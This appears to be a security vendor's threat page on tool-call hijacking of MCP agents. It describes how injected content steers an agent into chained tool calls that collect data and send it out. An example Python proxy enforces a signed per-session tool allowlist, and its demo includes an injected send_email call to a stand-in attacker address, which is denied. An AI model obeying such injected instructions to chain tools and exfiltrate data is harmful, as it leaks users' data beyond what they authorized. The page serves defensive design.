THREAT
Tool-Call Hijacking
unauthorized tool invocation, agent permission drift, MCP exploitation
Tool-call hijacking is the unauthorized invocation of an MCP tool — either by an injected instruction that impersonates authorized intent, or by an agent that has drifted beyond its permitted operational scope.
ADVERSARIAL MECHANICS
An injected payload (untrusted content the agent reads and treats as instructions) directs the agent to call a tool that was never part of the original request. The attacker can redirect the agent to send_email, write_file, or execute_code tools with attacker-controlled parameters. Chained tool calls amplify the damage: one call reads or collects sensitive data, the next transmits it to the attacker. Each call on its own looks like ordinary tool use, so the chain is only caught if every invocation is checked against what the principal actually authorized.
PROTOCOL CONTEXT (VEX — AUTHORITY PILLAR)
The VEX Protocol's Authority pillar addresses this directly: every tool invocation must be cryptographically bound to an authorized principal and a declared intent scope. An Evidence Capsule carries a signed authority claim specifying permitted tools.
ProvnAI Mitigation
Tool-call authorization in ProvnAI operates on a dual-layer model. The VEX Authority Control layer defines per-session tool allowlists tied to a verified principal. McpVanguard enforces these allowlists deterministically at the proxy boundary.
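The following is an added illustrative example of the two ideas on this page (a signed, per-session authority claim listing permitted tools, and deterministic allowlist enforcement at a proxy sitting in front of the MCP server). It is not ProvnAI, VEX, or McpVanguard code: the HMAC-over-JSON claim format, the session binding, the function names, and the demo principal and tool names are all assumptions chosen for the example. Only the JSON-RPC `tools/call` request shape follows MCP. The scenario walks the attack chain from the mechanics section: a legitimate read, then an injected `send_email` hop, plus a tampered claim, a replayed claim, and an expired one.

```python
"""Per-session tool allowlist enforced at an MCP proxy boundary (illustrative design, not ProvnAI's)."""
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed demo key. A real deployment would hold a per-session key in the
# authority service and never embed it in the proxy source.
SESSION_KEY = b"demo-session-key-not-for-production"


def _canonical(obj: dict) -> bytes:
    # Deterministic serialization so signer and verifier hash identical bytes.
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def issue_authority_claim(principal: str, session_id: str, permitted_tools,
                          ttl_s: int = 300, now: Optional[float] = None) -> dict:
    """Mint a signed authority claim binding a principal and session to a tool allowlist."""
    now = time.time() if now is None else now
    claim = {
        "principal": principal,
        "session_id": session_id,
        "permitted_tools": sorted(set(permitted_tools)),
        "exp": int(now) + ttl_s,
    }
    sig = hmac.new(SESSION_KEY, _canonical(claim), hashlib.sha256).hexdigest()
    return {"claim": claim, "sig": sig}


def verify_authority_claim(signed: dict, session_id: str, now: Optional[float] = None):
    """Return (claim, None) if signature, session binding and expiry hold, else (None, reason)."""
    now = time.time() if now is None else now
    claim, sig = signed.get("claim"), signed.get("sig", "")
    if not isinstance(claim, dict):
        return None, "malformed claim"
    expected = hmac.new(SESSION_KEY, _canonical(claim), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None, "bad signature"  # forged claim or allowlist edited in transit
    if claim.get("session_id") != session_id:
        return None, "claim not bound to this session"
    if now >= claim.get("exp", 0):
        return None, "claim expired"
    return claim, None


def authorize_tool_call(signed_claim: dict, session_id: str, rpc: dict, now: Optional[float] = None):
    """Decide one MCP JSON-RPC request at the proxy. Fails closed on anything unexpected."""
    if rpc.get("jsonrpc") != "2.0" or rpc.get("method") != "tools/call":
        return False, "only tools/call is mediated here"
    claim, reason = verify_authority_claim(signed_claim, session_id, now)
    if claim is None:
        return False, reason
    tool = (rpc.get("params") or {}).get("name")
    if not isinstance(tool, str):
        return False, "missing tool name"
    if tool not in claim["permitted_tools"]:
        return False, f"tool {tool!r} not in allowlist for {claim['principal']}"
    return True, "allowed"


def tools_call(req_id: int, name: str, arguments: dict) -> dict:
    """Build an MCP tools/call request (JSON-RPC 2.0 shape)."""
    return {"jsonrpc": "2.0", "id": req_id, "method": "tools/call",
            "params": {"name": name, "arguments": arguments}}


def demo(now: float = 1_700_000_000.0) -> dict:
    """Constructed scenario: legitimate read, then an injected exfiltration hop and three bad claims."""
    session = "sess-42"
    signed = issue_authority_claim("alice@example.test", session, ["read_file", "search_docs"], now=now)

    # The step the user asked for: inside the allowlist.
    ok_read, _ = authorize_tool_call(signed, session, tools_call(1, "read_file", {"path": "notes.md"}), now)

    # Second hop of the chain, injected by untrusted content: ship the data out.
    exfil = authorize_tool_call(
        signed, session, tools_call(2, "send_email", {"to": "attacker@example.test", "body": "notes"}), now)

    # Attacker edits the allowlist in transit without the session key: signature no longer verifies.
    tampered = json.loads(json.dumps(signed))
    tampered["claim"]["permitted_tools"].append("send_email")
    forged = authorize_tool_call(tampered, session, tools_call(3, "send_email", {}), now)

    # Same claim replayed under another session id: session binding fails.
    replay = authorize_tool_call(signed, "sess-99", tools_call(4, "read_file", {}), now)

    # Stale claim: expiry bounds how long a drifted agent can keep using it.
    stale = authorize_tool_call(signed, session, tools_call(5, "read_file", {}), now + 301)

    return {"read": ok_read, "exfil": exfil, "tampered": forged, "replay": replay, "stale": stale}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The proxy makes its decision per call from the claim alone, never from the conversation, so an injected instruction that convinces the agent it "should" send email changes nothing the proxy sees. The fail-closed branches matter as much as the allowlist: a malformed request, a missing tool name, or a claim from another session all deny.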